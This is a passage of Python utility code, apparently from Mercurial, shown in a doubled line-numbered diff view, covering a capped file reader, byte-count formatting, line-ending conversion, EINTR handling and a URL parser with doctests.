2418 s = nbytes and f.read(nbytes)
2419 if not s:
2419 if not s:
2420 break
2420 break
2421 if limit:
2421 if limit:
2422 limit -= len(s)
2422 limit -= len(s)
2423 yield s
2423 yield s
2424
2424
2425 class cappedreader(object):
2425 class cappedreader(object):
2426 """A file object proxy that allows reading up to N bytes.
2426 """A file object proxy that allows reading up to N bytes.
2427
2427
2428 Given a source file object, instances of this type allow reading up to
2428 Given a source file object, instances of this type allow reading up to
2429 N bytes from that source file object. Attempts to read past the allowed
2429 N bytes from that source file object. Attempts to read past the allowed
2430 limit are treated as EOF.
2430 limit are treated as EOF.
2431
2431
2432 It is assumed that I/O is not performed on the original file object
2432 It is assumed that I/O is not performed on the original file object
2433 in addition to I/O that is performed by this instance. If there is,
2433 in addition to I/O that is performed by this instance. If there is,
2434 state tracking will get out of sync and unexpected results will ensue.
2434 state tracking will get out of sync and unexpected results will ensue.
2435 """
2435 """
2436 def __init__(self, fh, limit):
2436 def __init__(self, fh, limit):
2437 """Allow reading up to <limit> bytes from <fh>."""
2437 """Allow reading up to <limit> bytes from <fh>."""
2438 self._fh = fh
2438 self._fh = fh
2439 self._left = limit
2439 self._left = limit
2440
2440
2441 def read(self, n=-1):
2441 def read(self, n=-1):
2442 if not self._left:
2442 if not self._left:
2443 return b''
2443 return b''
2444
2444
2445 if n < 0:
2445 if n < 0:
2446 n = self._left
2446 n = self._left
2447
2447
2448 data = self._fh.read(min(n, self._left))
2448 data = self._fh.read(min(n, self._left))
2449 self._left -= len(data)
2449 self._left -= len(data)
2450 assert self._left >= 0
2450 assert self._left >= 0
2451
2451
2452 return data
2452 return data
2453
2453
2454 def readinto(self, b):
2454 def readinto(self, b):
2455 res = self.read(len(b))
2455 res = self.read(len(b))
2456 if res is None:
2456 if res is None:
2457 return None
2457 return None
2458
2458
2459 b[0:len(res)] = res
2459 b[0:len(res)] = res
2460 return len(res)
2460 return len(res)
2461
2461
2462 def unitcountfn(*unittable):
2462 def unitcountfn(*unittable):
2463 '''return a function that renders a readable count of some quantity'''
2463 '''return a function that renders a readable count of some quantity'''
2464
2464
2465 def go(count):
2465 def go(count):
2466 for multiplier, divisor, format in unittable:
2466 for multiplier, divisor, format in unittable:
2467 if abs(count) >= divisor * multiplier:
2467 if abs(count) >= divisor * multiplier:
2468 return format % (count / float(divisor))
2468 return format % (count / float(divisor))
2469 return unittable[-1][2] % count
2469 return unittable[-1][2] % count
2470
2470
2471 return go
2471 return go
2472
2472
2473 def processlinerange(fromline, toline):
2473 def processlinerange(fromline, toline):
2474 """Check that linerange <fromline>:<toline> makes sense and return a
2474 """Check that linerange <fromline>:<toline> makes sense and return a
2475 0-based range.
2475 0-based range.
2476
2476
2477 >>> processlinerange(10, 20)
2477 >>> processlinerange(10, 20)
2478 (9, 20)
2478 (9, 20)
2479 >>> processlinerange(2, 1)
2479 >>> processlinerange(2, 1)
2480 Traceback (most recent call last):
2480 Traceback (most recent call last):
2481 ...
2481 ...
2482 ParseError: line range must be positive
2482 ParseError: line range must be positive
2483 >>> processlinerange(0, 5)
2483 >>> processlinerange(0, 5)
2484 Traceback (most recent call last):
2484 Traceback (most recent call last):
2485 ...
2485 ...
2486 ParseError: fromline must be strictly positive
2486 ParseError: fromline must be strictly positive
2487 """
2487 """
2488 if toline - fromline < 0:
2488 if toline - fromline < 0:
2489 raise error.ParseError(_("line range must be positive"))
2489 raise error.ParseError(_("line range must be positive"))
2490 if fromline < 1:
2490 if fromline < 1:
2491 raise error.ParseError(_("fromline must be strictly positive"))
2491 raise error.ParseError(_("fromline must be strictly positive"))
2492 return fromline - 1, toline
2492 return fromline - 1, toline
2493
2493
2494 bytecount = unitcountfn(
2494 bytecount = unitcountfn(
2495 (100, 1 << 30, _('%.0f GB')),
2495 (100, 1 << 30, _('%.0f GB')),
2496 (10, 1 << 30, _('%.1f GB')),
2496 (10, 1 << 30, _('%.1f GB')),
2497 (1, 1 << 30, _('%.2f GB')),
2497 (1, 1 << 30, _('%.2f GB')),
2498 (100, 1 << 20, _('%.0f MB')),
2498 (100, 1 << 20, _('%.0f MB')),
2499 (10, 1 << 20, _('%.1f MB')),
2499 (10, 1 << 20, _('%.1f MB')),
2500 (1, 1 << 20, _('%.2f MB')),
2500 (1, 1 << 20, _('%.2f MB')),
2501 (100, 1 << 10, _('%.0f KB')),
2501 (100, 1 << 10, _('%.0f KB')),
2502 (10, 1 << 10, _('%.1f KB')),
2502 (10, 1 << 10, _('%.1f KB')),
2503 (1, 1 << 10, _('%.2f KB')),
2503 (1, 1 << 10, _('%.2f KB')),
2504 (1, 1, _('%.0f bytes')),
2504 (1, 1, _('%.0f bytes')),
2505 )
2505 )
2506
2506
2507 class transformingwriter(object):
2507 class transformingwriter(object):
2508 """Writable file wrapper to transform data by function"""
2508 """Writable file wrapper to transform data by function"""
2509
2509
2510 def __init__(self, fp, encode):
2510 def __init__(self, fp, encode):
2511 self._fp = fp
2511 self._fp = fp
2512 self._encode = encode
2512 self._encode = encode
2513
2513
2514 def close(self):
2514 def close(self):
2515 self._fp.close()
2515 self._fp.close()
2516
2516
2517 def flush(self):
2517 def flush(self):
2518 self._fp.flush()
2518 self._fp.flush()
2519
2519
2520 def write(self, data):
2520 def write(self, data):
2521 return self._fp.write(self._encode(data))
2521 return self._fp.write(self._encode(data))
2522
2522
2523 # Matches a single EOL which can either be a CRLF where repeated CR
2523 # Matches a single EOL which can either be a CRLF where repeated CR
2524 # are removed or a LF. We do not care about old Macintosh files, so a
2524 # are removed or a LF. We do not care about old Macintosh files, so a
2525 # stray CR is an error.
2525 # stray CR is an error.
2526 _eolre = remod.compile(br'\r*\n')
2526 _eolre = remod.compile(br'\r*\n')
2527
2527
2528 def tolf(s):
2528 def tolf(s):
2529 return _eolre.sub('\n', s)
2529 return _eolre.sub('\n', s)
2530
2530
2531 def tocrlf(s):
2531 def tocrlf(s):
2532 return _eolre.sub('\r\n', s)
2532 return _eolre.sub('\r\n', s)
2533
2533
2534 def _crlfwriter(fp):
2534 def _crlfwriter(fp):
2535 return transformingwriter(fp, tocrlf)
2535 return transformingwriter(fp, tocrlf)
2536
2536
2537 if pycompat.oslinesep == '\r\n':
2537 if pycompat.oslinesep == '\r\n':
2538 tonativeeol = tocrlf
2538 tonativeeol = tocrlf
2539 fromnativeeol = tolf
2539 fromnativeeol = tolf
2540 nativeeolwriter = _crlfwriter
2540 nativeeolwriter = _crlfwriter
2541 else:
2541 else:
2542 tonativeeol = pycompat.identity
2542 tonativeeol = pycompat.identity
2543 fromnativeeol = pycompat.identity
2543 fromnativeeol = pycompat.identity
2544 nativeeolwriter = pycompat.identity
2544 nativeeolwriter = pycompat.identity
2545
2545
2546 if (pyplatform.python_implementation() == 'CPython' and
2546 if (pyplatform.python_implementation() == 'CPython' and
2547 sys.version_info < (3, 0)):
2547 sys.version_info < (3, 0)):
2548 # There is an issue in CPython that some IO methods do not handle EINTR
2548 # There is an issue in CPython that some IO methods do not handle EINTR
2549 # correctly. The following table shows what CPython version (and functions)
2549 # correctly. The following table shows what CPython version (and functions)
2550 # are affected (buggy: has the EINTR bug, okay: otherwise):
2550 # are affected (buggy: has the EINTR bug, okay: otherwise):
2551 #
2551 #
2552 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2552 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2553 # --------------------------------------------------
2553 # --------------------------------------------------
2554 # fp.__iter__ | buggy | buggy | okay
2554 # fp.__iter__ | buggy | buggy | okay
2555 # fp.read* | buggy | okay [1] | okay
2555 # fp.read* | buggy | okay [1] | okay
2556 #
2556 #
2557 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2557 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2558 #
2558 #
2559 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2559 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2560 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2560 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2561 #
2561 #
2562 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2562 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2563 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2563 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2564 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2564 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2565 # fp.__iter__ but not other fp.read* methods.
2565 # fp.__iter__ but not other fp.read* methods.
2566 #
2566 #
2567 # On modern systems like Linux, the "read" syscall cannot be interrupted
2567 # On modern systems like Linux, the "read" syscall cannot be interrupted
2568 # when reading "fast" files like on-disk files. So the EINTR issue only
2568 # when reading "fast" files like on-disk files. So the EINTR issue only
2569 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2569 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2570 # files approximately as "fast" files and use the fast (unsafe) code path,
2570 # files approximately as "fast" files and use the fast (unsafe) code path,
2571 # to minimize the performance impact.
2571 # to minimize the performance impact.
2572 if sys.version_info >= (2, 7, 4):
2572 if sys.version_info >= (2, 7, 4):
2573 # fp.readline deals with EINTR correctly, use it as a workaround.
2573 # fp.readline deals with EINTR correctly, use it as a workaround.
2574 def _safeiterfile(fp):
2574 def _safeiterfile(fp):
2575 return iter(fp.readline, '')
2575 return iter(fp.readline, '')
2576 else:
2576 else:
2577 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2577 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2578 # note: this may block longer than necessary because of bufsize.
2578 # note: this may block longer than necessary because of bufsize.
2579 def _safeiterfile(fp, bufsize=4096):
2579 def _safeiterfile(fp, bufsize=4096):
2580 fd = fp.fileno()
2580 fd = fp.fileno()
2581 line = ''
2581 line = ''
2582 while True:
2582 while True:
2583 try:
2583 try:
2584 buf = os.read(fd, bufsize)
2584 buf = os.read(fd, bufsize)
2585 except OSError as ex:
2585 except OSError as ex:
2586 # os.read only raises EINTR before any data is read
2586 # os.read only raises EINTR before any data is read
2587 if ex.errno == errno.EINTR:
2587 if ex.errno == errno.EINTR:
2588 continue
2588 continue
2589 else:
2589 else:
2590 raise
2590 raise
2591 line += buf
2591 line += buf
2592 if '\n' in buf:
2592 if '\n' in buf:
2593 splitted = line.splitlines(True)
2593 splitted = line.splitlines(True)
2594 line = ''
2594 line = ''
2595 for l in splitted:
2595 for l in splitted:
2596 if l[-1] == '\n':
2596 if l[-1] == '\n':
2597 yield l
2597 yield l
2598 else:
2598 else:
2599 line = l
2599 line = l
2600 if not buf:
2600 if not buf:
2601 break
2601 break
2602 if line:
2602 if line:
2603 yield line
2603 yield line
2604
2604
2605 def iterfile(fp):
2605 def iterfile(fp):
2606 fastpath = True
2606 fastpath = True
2607 if type(fp) is file:
2607 if type(fp) is file:
2608 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2608 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2609 if fastpath:
2609 if fastpath:
2610 return fp
2610 return fp
2611 else:
2611 else:
2612 return _safeiterfile(fp)
2612 return _safeiterfile(fp)
2613 else:
2613 else:
2614 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2614 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2615 def iterfile(fp):
2615 def iterfile(fp):
2616 return fp
2616 return fp
2617
2617
2618 def iterlines(iterator):
2618 def iterlines(iterator):
2619 for chunk in iterator:
2619 for chunk in iterator:
2620 for line in chunk.splitlines():
2620 for line in chunk.splitlines():
2621 yield line
2621 yield line
2622
2622
2623 def expandpath(path):
2623 def expandpath(path):
2624 return os.path.expanduser(os.path.expandvars(path))
2624 return os.path.expanduser(os.path.expandvars(path))
2625
2625
2626 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2626 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2627 """Return the result of interpolating items in the mapping into string s.
2627 """Return the result of interpolating items in the mapping into string s.
2628
2628
2629 prefix is a single character string, or a two character string with
2629 prefix is a single character string, or a two character string with
2630 a backslash as the first character if the prefix needs to be escaped in
2630 a backslash as the first character if the prefix needs to be escaped in
2631 a regular expression.
2631 a regular expression.
2632
2632
2633 fn is an optional function that will be applied to the replacement text
2633 fn is an optional function that will be applied to the replacement text
2634 just before replacement.
2634 just before replacement.
2635
2635
2636 escape_prefix is an optional flag that allows using doubled prefix for
2636 escape_prefix is an optional flag that allows using doubled prefix for
2637 its escaping.
2637 its escaping.
2638 """
2638 """
2639 fn = fn or (lambda s: s)
2639 fn = fn or (lambda s: s)
2640 patterns = '|'.join(mapping.keys())
2640 patterns = '|'.join(mapping.keys())
2641 if escape_prefix:
2641 if escape_prefix:
2642 patterns += '|' + prefix
2642 patterns += '|' + prefix
2643 if len(prefix) > 1:
2643 if len(prefix) > 1:
2644 prefix_char = prefix[1:]
2644 prefix_char = prefix[1:]
2645 else:
2645 else:
2646 prefix_char = prefix
2646 prefix_char = prefix
2647 mapping[prefix_char] = prefix_char
2647 mapping[prefix_char] = prefix_char
2648 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2648 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2649 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2649 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2650
2650
2651 def getport(port):
2651 def getport(port):
2652 """Return the port for a given network service.
2652 """Return the port for a given network service.
2653
2653
2654 If port is an integer, it's returned as is. If it's a string, it's
2654 If port is an integer, it's returned as is. If it's a string, it's
2655 looked up using socket.getservbyname(). If there's no matching
2655 looked up using socket.getservbyname(). If there's no matching
2656 service, error.Abort is raised.
2656 service, error.Abort is raised.
2657 """
2657 """
2658 try:
2658 try:
2659 return int(port)
2659 return int(port)
2660 except ValueError:
2660 except ValueError:
2661 pass
2661 pass
2662
2662
2663 try:
2663 try:
2664 return socket.getservbyname(pycompat.sysstr(port))
2664 return socket.getservbyname(pycompat.sysstr(port))
2665 except socket.error:
2665 except socket.error:
2666 raise error.Abort(_("no port number associated with service '%s'")
2666 raise error.Abort(_("no port number associated with service '%s'")
2667 % port)
2667 % port)
2668
2668
2669 class url(object):
2669 class url(object):
2670 r"""Reliable URL parser.
2670 r"""Reliable URL parser.
2671
2671
2672 This parses URLs and provides attributes for the following
2672 This parses URLs and provides attributes for the following
2673 components:
2673 components:
2674
2674
2675 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2675 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2676
2676
2677 Missing components are set to None. The only exception is
2677 Missing components are set to None. The only exception is
2678 fragment, which is set to '' if present but empty.
2678 fragment, which is set to '' if present but empty.
2679
2679
2680 If parsefragment is False, fragment is included in query. If
2680 If parsefragment is False, fragment is included in query. If
2681 parsequery is False, query is included in path. If both are
2681 parsequery is False, query is included in path. If both are
2682 False, both fragment and query are included in path.
2682 False, both fragment and query are included in path.
2683
2683
2684 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2684 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2685
2685
2686 Note that for backward compatibility reasons, bundle URLs do not
2686 Note that for backward compatibility reasons, bundle URLs do not
2687 take host names. That means 'bundle://../' has a path of '../'.
2687 take host names. That means 'bundle://../' has a path of '../'.
2688
2688
2689 Examples:
2689 Examples:
2690
2690
2691 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2691 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2692 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2692 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2693 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2693 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2694 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2694 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2695 >>> url(b'file:///home/joe/repo')
2695 >>> url(b'file:///home/joe/repo')
2696 <url scheme: 'file', path: '/home/joe/repo'>
2696 <url scheme: 'file', path: '/home/joe/repo'>
2697 >>> url(b'file:///c:/temp/foo/')
2697 >>> url(b'file:///c:/temp/foo/')
2698 <url scheme: 'file', path: 'c:/temp/foo/'>
2698 <url scheme: 'file', path: 'c:/temp/foo/'>
2699 >>> url(b'bundle:foo')
2699 >>> url(b'bundle:foo')
2700 <url scheme: 'bundle', path: 'foo'>
2700 <url scheme: 'bundle', path: 'foo'>
2701 >>> url(b'bundle://../foo')
2701 >>> url(b'bundle://../foo')
2702 <url scheme: 'bundle', path: '../foo'>
2702 <url scheme: 'bundle', path: '../foo'>
2703 >>> url(br'c:\foo\bar')
2703 >>> url(br'c:\foo\bar')
2704 <url path: 'c:\\foo\\bar'>
2704 <url path: 'c:\\foo\\bar'>
2705 >>> url(br'\\blah\blah\blah')
2705 >>> url(br'\\blah\blah\blah')
2706 <url path: '\\\\blah\\blah\\blah'>
2706 <url path: '\\\\blah\\blah\\blah'>
2707 >>> url(br'\\blah\blah\blah#baz')
2707 >>> url(br'\\blah\blah\blah#baz')
2708 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2708 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2709 >>> url(br'file:///C:\users\me')
2709 >>> url(br'file:///C:\users\me')
2710 <url scheme: 'file', path: 'C:\\users\\me'>
2710 <url scheme: 'file', path: 'C:\\users\\me'>
2711
2711
2712 Authentication credentials:
2712 Authentication credentials:
2713
2713
2714 >>> url(b'ssh://joe:xyz@x/repo')
2714 >>> url(b'ssh://joe:xyz@x/repo')
2715 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2715 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2716 >>> url(b'ssh://joe@x/repo')
2716 >>> url(b'ssh://joe@x/repo')
2717 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2717 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2718
2718
2719 Query strings and fragments:
2719 Query strings and fragments:
2720
2720
2721 >>> url(b'http://host/a?b#c')
2721 >>> url(b'http://host/a?b#c')
2722 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2722 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2723 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2723 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2724 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2724 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2725
2725
2726 Empty path:
2726 Empty path:
2727
2727
2728 >>> url(b'')
2728 >>> url(b'')
2729 <url path: ''>
2729 <url path: ''>
2730 >>> url(b'#a')
2730 >>> url(b'#a')
2731 <url path: '', fragment: 'a'>
2731 <url path: '', fragment: 'a'>
2732 >>> url(b'http://host/')
2732 >>> url(b'http://host/')
2733 <url scheme: 'http', host: 'host', path: ''>
2733 <url scheme: 'http', host: 'host', path: ''>
2734 >>> url(b'http://host/#a')
2734 >>> url(b'http://host/#a')
2735 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2735 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2736
2736
2737 Only scheme:
2737 Only scheme:
2738
2738
2739 >>> url(b'http:')
2739 >>> url(b'http:')
2740 <url scheme: 'http'>
2740 <url scheme: 'http'>
2741 """
2741 """
2742
2742
2743 _safechars = "!~*'()+"
2743 _safechars = "!~*'()+"
2744 _safepchars = "/!~*'()+:\\"
2744 _safepchars = "/!~*'()+:\\"
2745 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2745 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2746
2746
2747 def __init__(self, path, parsequery=True, parsefragment=True):
2747 def __init__(self, path, parsequery=True, parsefragment=True):
2748 # We slowly chomp away at path until we have only the path left
2748 # We slowly chomp away at path until we have only the path left
2749 self.scheme = self.user = self.passwd = self.host = None
2749 self.scheme = self.user = self.passwd = self.host = None
2750 self.port = self.path = self.query = self.fragment = None
2750 self.port = self.path = self.query = self.fragment = None
2751 self._localpath = True
2751 self._localpath = True
2752 self._hostport = ''
2752 self._hostport = ''
2753 self._origpath = path
2753 self._origpath = path
2754
2754
2755 if parsefragment and '#' in path:
2755 if parsefragment and '#' in path:
2756 path, self.fragment = path.split('#', 1)
2756 path, self.fragment = path.split('#', 1)
2757
2757
2758 # special case for Windows drive letters and UNC paths
2758 # special case for Windows drive letters and UNC paths
2759 if hasdriveletter(path) or path.startswith('\\\\'):
2759 if hasdriveletter(path) or path.startswith('\\\\'):
2760 self.path = path
2760 self.path = path
2761 return
2761 return
2762
2762
2763 # For compatibility reasons, we can't handle bundle paths as
2763 # For compatibility reasons, we can't handle bundle paths as
2764 # normal URLS
2764 # normal URLS
2765 if path.startswith('bundle:'):
2765 if path.startswith('bundle:'):
2766 self.scheme = 'bundle'
2766 self.scheme = 'bundle'
2767 path = path[7:]
2767 path = path[7:]
2768 if path.startswith('//'):
2768 if path.startswith('//'):
2769 path = path[2:]
2769 path = path[2:]
2770 self.path = path
2770 self.path = path
2771 return
2771 return
2772
2772
2773 if self._matchscheme(path):
2773 if self._matchscheme(path):
2774 parts = path.split(':', 1)
2774 parts = path.split(':', 1)
2775 if parts[0]:
2775 if parts[0]:
2776 self.scheme, path = parts
2776 self.scheme, path = parts
2777 self._localpath = False
2777 self._localpath = False
2778
2778
2779 if not path:
2779 if not path:
2780 path = None
2780 path = None
2781 if self._localpath:
2781 if self._localpath:
2782 self.path = ''
2782 self.path = ''
2783 return
2783 return
2784 else:
2784 else:
2785 if self._localpath:
2785 if self._localpath:
2786 self.path = path
2786 self.path = path
2787 return
2787 return
2788
2788
2789 if parsequery and '?' in path:
2789 if parsequery and '?' in path:
2790 path, self.query = path.split('?', 1)
2790 path, self.query = path.split('?', 1)
2791 if not path:
2791 if not path:
2792 path = None
2792 path = None
2793 if not self.query:
2793 if not self.query:
2794 self.query = None
2794 self.query = None
2795
2795
2796 # // is required to specify a host/authority
2796 # // is required to specify a host/authority
2797 if path and path.startswith('//'):
2797 if path and path.startswith('//'):
2798 parts = path[2:].split('/', 1)
2798 parts = path[2:].split('/', 1)
2799 if len(parts) > 1:
2799 if len(parts) > 1:
2800 self.host, path = parts
2800 self.host, path = parts
2801 else:
2801 else:
2802 self.host = parts[0]
2802 self.host = parts[0]
2803 path = None
2803 path = None
2804 if not self.host:
2804 if not self.host:
2805 self.host = None
2805 self.host = None
2806 # path of file:///d is /d
2806 # path of file:///d is /d
2807 # path of file:///d:/ is d:/, not /d:/
2807 # path of file:///d:/ is d:/, not /d:/
2808 if path and not hasdriveletter(path):
2808 if path and not hasdriveletter(path):
2809 path = '/' + path
2809 path = '/' + path
2810
2810
2811 if self.host and '@' in self.host:
2811 if self.host and '@' in self.host:
2812 self.user, self.host = self.host.rsplit('@', 1)
2812 self.user, self.host = self.host.rsplit('@', 1)
2813 if ':' in self.user:
2813 if ':' in self.user:
2814 self.user, self.passwd = self.user.split(':', 1)
2814 self.user, self.passwd = self.user.split(':', 1)
2815 if not self.host:
2815 if not self.host:
2816 self.host = None
2816 self.host = None
2817
2817
2818 # Don't split on colons in IPv6 addresses without ports
2818 # Don't split on colons in IPv6 addresses without ports
2819 if (self.host and ':' in self.host and
2819 if (self.host and ':' in self.host and
2820 not (self.host.startswith('[') and self.host.endswith(']'))):
2820 not (self.host.startswith('[') and self.host.endswith(']'))):
2821 self._hostport = self.host
2821 self._hostport = self.host
2822 self.host, self.port = self.host.rsplit(':', 1)
2822 self.host, self.port = self.host.rsplit(':', 1)
2823 if not self.host:
2823 if not self.host:
2824 self.host = None
2824 self.host = None
2825
2825
2826 if (self.host and self.scheme == 'file' and
2826 if (self.host and self.scheme == 'file' and
2827 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2827 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2828 raise error.Abort(_('file:// URLs can only refer to localhost'))
2828 raise error.Abort(_('file:// URLs can only refer to localhost'))
2829
2829
2830 self.path = path
2830 self.path = path
2831
2831
2832 # leave the query string escaped
2832 # leave the query string escaped
2833 for a in ('user', 'passwd', 'host', 'port',
2833 for a in ('user', 'passwd', 'host', 'port',
2834 'path', 'fragment'):
2834 'path', 'fragment'):
2835 v = getattr(self, a)
2835 v = getattr(self, a)
2836 if v is not None:
2836 if v is not None:
2837 setattr(self, a, urlreq.unquote(v))
2837 setattr(self, a, urlreq.unquote(v))
2838
2838
2839 @encoding.strmethod
2839 @encoding.strmethod
2840 def __repr__(self):
2840 def __repr__(self):
2841 attrs = []
2841 attrs = []
2842 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2842 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2843 'query', 'fragment'):
2843 'query', 'fragment'):
2844 v = getattr(self, a)
2844 v = getattr(self, a)
2845 if v is not None:
2845 if v is not None:
2846 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2846 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2847 return '<url %s>' % ', '.join(attrs)
2847 return '<url %s>' % ', '.join(attrs)
2848
2848
2849 def __bytes__(self):
2849 def __bytes__(self):
2850 r"""Join the URL's components back into a URL string.
2850 r"""Join the URL's components back into a URL string.
2851
2851
2852 Examples:
2852 Examples:
2853
2853
2854 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2854 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2855 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2855 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2856 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2856 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2857 'http://user:pw@host:80/?foo=bar&baz=42'
2857 'http://user:pw@host:80/?foo=bar&baz=42'
2858 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2858 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2859 'http://user:pw@host:80/?foo=bar%3dbaz'
2859 'http://user:pw@host:80/?foo=bar%3dbaz'
2860 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2860 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2861 'ssh://user:pw@[::1]:2200//home/joe#'
2861 'ssh://user:pw@[::1]:2200//home/joe#'
2862 >>> bytes(url(b'http://localhost:80//'))
2862 >>> bytes(url(b'http://localhost:80//'))
2863 'http://localhost:80//'
2863 'http://localhost:80//'
2864 >>> bytes(url(b'http://localhost:80/'))
2864 >>> bytes(url(b'http://localhost:80/'))
2865 'http://localhost:80/'
2865 'http://localhost:80/'
2866 >>> bytes(url(b'http://localhost:80'))
2866 >>> bytes(url(b'http://localhost:80'))
2867 'http://localhost:80/'
2867 'http://localhost:80/'
2868 >>> bytes(url(b'bundle:foo'))
2868 >>> bytes(url(b'bundle:foo'))
2869 'bundle:foo'
2869 'bundle:foo'
2870 >>> bytes(url(b'bundle://../foo'))
2870 >>> bytes(url(b'bundle://../foo'))
2871 'bundle:../foo'
2871 'bundle:../foo'
2872 >>> bytes(url(b'path'))
2872 >>> bytes(url(b'path'))
2873 'path'
2873 'path'
2874 >>> bytes(url(b'file:///tmp/foo/bar'))
2874 >>> bytes(url(b'file:///tmp/foo/bar'))
2875 'file:///tmp/foo/bar'
2875 'file:///tmp/foo/bar'
2876 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2876 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2877 'file:///c:/tmp/foo/bar'
2877 'file:///c:/tmp/foo/bar'
2878 >>> print(url(br'bundle:foo\bar'))
2878 >>> print(url(br'bundle:foo\bar'))
2879 bundle:foo\bar
2879 bundle:foo\bar
2880 >>> print(url(br'file:///D:\data\hg'))
2880 >>> print(url(br'file:///D:\data\hg'))
2881 file:///D:\data\hg
2881 file:///D:\data\hg
2882 """
2882 """
2883 if self._localpath:
2883 if self._localpath:
2884 s = self.path
2884 s = self.path
2885 if self.scheme == 'bundle':
2885 if self.scheme == 'bundle':
2886 s = 'bundle:' + s
2886 s = 'bundle:' + s
2887 if self.fragment:
2887 if self.fragment:
2888 s += '#' + self.fragment
2888 s += '#' + self.fragment
2889 return s
2889 return s
2890
2890
2891 s = self.scheme + ':'
2891 s = self.scheme + ':'
2892 if self.user or self.passwd or self.host:
2892 if self.user or self.passwd or self.host:
2893 s += '//'
2893 s += '//'
2894 elif self.scheme and (not self.path or self.path.startswith('/')
2894 elif self.scheme and (not self.path or self.path.startswith('/')
2895 or hasdriveletter(self.path)):
2895 or hasdriveletter(self.path)):
2896 s += '//'
2896 s += '//'
2897 if hasdriveletter(self.path):
2897 if hasdriveletter(self.path):
2898 s += '/'
2898 s += '/'
2899 if self.user:
2899 if self.user:
2900 s += urlreq.quote(self.user, safe=self._safechars)
2900 s += urlreq.quote(self.user, safe=self._safechars)
2901 if self.passwd:
2901 if self.passwd:
2902 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2902 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2903 if self.user or self.passwd:
2903 if self.user or self.passwd:
2904 s += '@'
2904 s += '@'
2905 if self.host:
2905 if self.host:
2906 if not (self.host.startswith('[') and self.host.endswith(']')):
2906 if not (self.host.startswith('[') and self.host.endswith(']')):
2907 s += urlreq.quote(self.host)
2907 s += urlreq.quote(self.host)
2908 else:
2908 else:
